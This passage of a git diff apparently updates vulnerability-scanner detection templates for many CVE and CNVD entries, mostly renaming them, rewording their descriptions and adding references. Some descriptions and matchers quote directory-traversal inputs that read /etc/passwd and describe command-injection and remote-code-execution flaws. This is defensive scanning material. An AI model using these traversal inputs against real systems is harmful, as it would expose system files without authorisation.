b/cnvd/2021/CNVD-2021-28277.yaml index 5be02217e6..1277253402 100644 --- a/cnvd/2021/CNVD-2021-28277.yaml +++ b/cnvd/2021/CNVD-2021-28277.yaml @@ -1,7 +1,7 @@ id: CNVD-2021-28277 info: - name: Landray-OA Arbitrary File Download + name: Landray-OA Arbitrary - Arbitrary File Retrieval author: pikpikcu,daffainfo severity: high reference: @@ -41,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/2022/CNVD-2022-03672.yaml b/cnvd/2022/CNVD-2022-03672.yaml index 400f7dc2ad..b3e9de9132 100644 --- a/cnvd/2022/CNVD-2022-03672.yaml +++ b/cnvd/2022/CNVD-2022-03672.yaml @@ -1,14 +1,19 @@ id: CNVD-2022-03672 info: - name: Sunflower Simple and Personal edition RCE + name: Sunflower Simple and Personal - Remote Code Execution author: daffainfo severity: critical + description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: cnvd,cnvd2020,sunflower,rce requests: @@ -40,3 +45,5 @@ requests: - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml index 1f7016cd9f..44ac9a5200 100644 --- a/cves/2007/CVE-2007-4504.yaml +++ b/cves/2007/CVE-2007-4504.yaml @@ -1,10 +1,10 @@ id: CVE-2007-4504 info: - name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://www.cvedetails.com/cve/CVE-2007-4504 diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml index a73a43ea84..011cddc99d 100644 --- a/cves/2010/CVE-2010-0696.yaml +++ b/cves/2010/CVE-2010-0696.yaml @@ -1,7 +1,7 @@ id: CVE-2010-0696 info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo severity: high description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. @@ -25,4 +25,5 @@ requests: - type: status status: - 200 + # Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 2042183974..ed2f24987f 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml @@ -1,10 +1,10 @@ id: CVE-2010-2122 info: - name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo severity: high - description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://www.cvedetails.com/cve/CVE-2010-2122 diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml index 4c7856343b..8ab1009b02 100644 --- a/cves/2010/CVE-2010-3203.yaml +++ b/cves/2010/CVE-2010-3203.yaml @@ -1,7 +1,7 @@ id: CVE-2010-3203 info: - name: Joomla! Component PicSell 1.0 - Local File Disclosure + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo severity: high description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index f2e7c8e099..f116177a76 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -1,10 +1,10 @@ id: CVE-2015-4694 info: - name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Download + name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. reference: - https://wordpress.org/plugins/zip-attachments/#developers - https://wpscan.com/vulnerability/8047 diff --git a/cves/2017/CVE-2017-11512.yaml b/cves/2017/CVE-2017-11512.yaml index 279dc4e183..d5a5f7edbf 100644 --- a/cves/2017/CVE-2017-11512.yaml +++ b/cves/2017/CVE-2017-11512.yaml @@ -1,11 +1,11 @@ id: CVE-2017-11512 info: - name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download + name: ManageEngine ServiceDesk - Arbitrary File Retrieval author: 0x_Akoko severity: high description: | - The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + The ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.cvedetails.com/cve/CVE-2017-11512 diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml index 4349f108ff..1118798c3b 100644 --- a/cves/2017/CVE-2017-15363.yaml +++ b/cves/2017/CVE-2017-15363.yaml @@ -1,7 +1,7 @@ id: CVE-2017-15363 info: - name: Typo3 Restler Extension - Local File Disclosure + name: TYPO3 Restler - Arbitrary File Retrieval author: 0x_Akoko severity: high description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter. diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index d7bda567cc..c3897f688a 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -5,7 +5,7 @@ info: author: thomas_from_offensity,geeknik severity: critical description: | - Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnearbility in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If " + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index d5d14211b8..8194ae8495 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -1,13 +1,13 @@ id: CVE-2018-1000861 info: - name: Jenkins 2.138 Remote Command Execution + name: Jenkins - Remote Command Injection author: dhiyaneshDK,pikpikcu severity: critical - description: A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows - attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. reference: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -31,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index 469063f4ce..b66f95704a 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -1,10 +1,10 @@ id: CVE-2018-10562 info: - name: Dasan GPON Devices - Remote Code Execution (Unauthenticated) + name: Dasan GPON Devices - Remote Code Execution author: gy741 severity: critical - description: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping + description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router @@ -37,3 +37,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 6be7ac0dd7..4e98b1fb1d 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -4,11 +4,11 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: critical - description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index 0bbeab8144..62b9881bd4 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml @@ -1,19 +1,17 @@ id: CVE-2018-1207 info: - name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE + name: Dell iDRAC7/8 Devices - Remote Code Injection author: dwisiswant0 severity: critical description: | - This template supports the detection part only. - - Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability + Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. - - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py reference: - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf + - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -30,3 +28,5 @@ requests: words: - "calling init: /lib/" part: response + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml index 90ff0b0135..53736ed55a 100644 --- a/cves/2018/CVE-2018-12300.yaml +++ b/cves/2018/CVE-2018-12300.yaml @@ -1,7 +1,7 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open redirect + name: Seagate NAS OS 4.3.15.1 - Open Redirect author: 0x_Akoko severity: medium description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index c70ccfedb9..edc2910da7 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,12 +1,13 @@ id: CVE-2018-12634 info: - name: Exposed CirCarLife System Log + name: CirCarLife Scada <4.3 - System Log Exposure author: geeknik severity: critical - description: CirCarLife is an internet-connected electric vehicle charging station + description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. reference: - https://circontrol.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 8e19b457a9..657424e411 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -1,7 +1,7 @@ id: CVE-2018-1273 info: - name: Spring Data Commons Unauthenticated RCE + name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | @@ -42,3 +42,5 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index 0091d7ef30..3ad6d6e608 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -1,14 +1,14 @@ id: CVE-2018-13379 info: - name: FortiOS - Credentials Disclosure + name: Fortinet FortiOS - Credentials Disclosure author: organiccrap severity: critical - description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 - to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests. + description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -24,3 +24,5 @@ requests: - type: word words: - "var fgt_lang" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml index 5f74b55601..9d12a07112 100644 --- a/cves/2018/CVE-2018-13980.yaml +++ b/cves/2018/CVE-2018-13980.yaml @@ -1,7 +1,7 @@ id: CVE-2018-13980 info: - name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval author: wisnupramoedya severity: medium description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index 50015d4823..d8cf45f3a7 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml @@ -4,7 +4,7 @@ info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical - description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 @@ -31,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-14916.yaml b/cves/2018/CVE-2018-14916.yaml index 95da4dba55..e4673b98bb 100644 --- a/cves/2018/CVE-2018-14916.yaml +++ b/cves/2018/CVE-2018-14916.yaml @@ -1,10 +1,10 @@ id: CVE-2018-14916 info: - name: Loytec LGATE-902 Directory Traversal + name: Loytec LGATE-902 <6.4.2 - Local File Inclusion author: 0x_Akoko severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. + description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 @@ -30,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index c3c291ce89..08b7fb93d4 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -1,10 +1,10 @@ id: CVE-2018-15517 info: - name: D-LINK Central WifiManager Server-Side Request Forgery + name: D-Link Central WifiManager - Server-Side Request Forgery author: gy741 severity: high - description: D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP + description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. reference: diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 079592a817..926b4dd68b 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -1,7 +1,7 @@ id: CVE-2018-16167 info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. @@ -30,3 +30,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index 07e5d545ba..d12fec7ba7 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -1,14 +1,15 @@ id: CVE-2018-16763 info: - name: fuelCMS 1.4.1 - Remote Code Execution + name: FUEL CMS 1.4.1 - Remote Code Execution author: pikpikcu severity: critical - description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution. + description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. reference: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -30,3 +31,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index 87e87bd4aa..6557b09070 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -1,13 +1,13 @@ id: CVE-2018-16836 info: - name: Rubedo CMS 3.4.0 - Directory Traversal + name: Rubedo CMS <=3.4.0 - Directory Traversal author: 0x_Akoko severity: critical - description: Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as - demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. reference: - https://www.exploit-db.com/exploits/45385 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -29,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 52c604d738..8a33e82710 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -1,14 +1,13 @@ id: CVE-2018-17246 info: - name: Kibana Local File Inclusion + name: Kibana - Local File Inclusion author: princechaddha severity: critical - description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute - javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -38,3 +37,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 30b1f39e38..ae4fdebaa3 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -1,13 +1,14 @@ id: CVE-2018-17431 info: - name: Comodo Unified Threat Management Web Console 2.7.0 - RCE + name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical - description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) + description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,4 +36,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-18925.yaml b/cves/2018/CVE-2018-18925.yaml index c79c196fe2..cff6c60e67 100644 --- a/cves/2018/CVE-2018-18925.yaml +++ b/cves/2018/CVE-2018-18925.yaml @@ -1,11 +1,10 @@ id: CVE-2018-18925 info: - name: Gogs - Remote Code Execution (CVE-2018-18925) + name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution author: princechaddha severity: critical - description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related - to session ID handling in the go-macaron/session code for Macaron. + description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. reference: - https://www.anquanke.com/post/id/163575 - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 @@ -15,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - remediation: This issue will be fixed by updating to the latest version of Gogs + remediation: This issue will be fixed by updating to the latest version of Gogs. tags: cve,cve2018,gogs,lfi,rce requests: @@ -35,3 +34,5 @@ requests: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 1566a653dc..4da57ce3f1 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -1,13 +1,13 @@ id: CVE-2018-20985 info: - name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo severity: critical - description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive - information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers - https://www.cvedetails.com/cve/CVE-2018-20985/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -35,3 +35,6 @@ requests: - type: status status: - 200 + + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 698150de04..ce5ace24c1 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -1,13 +1,15 @@ id: CVE-2018-2894 info: - name: Oracle WebLogic RCE + name: Oracle WebLogic Server - Remote Code Execution author: geeknik,pdteam severity: critical - description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. reference: - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2894 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -90,3 +92,5 @@ requests: - type: word words: - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index e906d11418..4602a84822 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -1,14 +1,13 @@ id: CVE-2018-3810 info: - name: WordPress Smart Google Code Inserter Authentication Bypass + name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass author: princechaddha severity: critical - description: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic - parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated - user to successfully update the inserted code. + description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. reference: - https://www.exploit-db.com/exploits/43420 + - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -44,3 +43,6 @@ requests: - type: status status: - 200 + + +# Enhanced by mp on 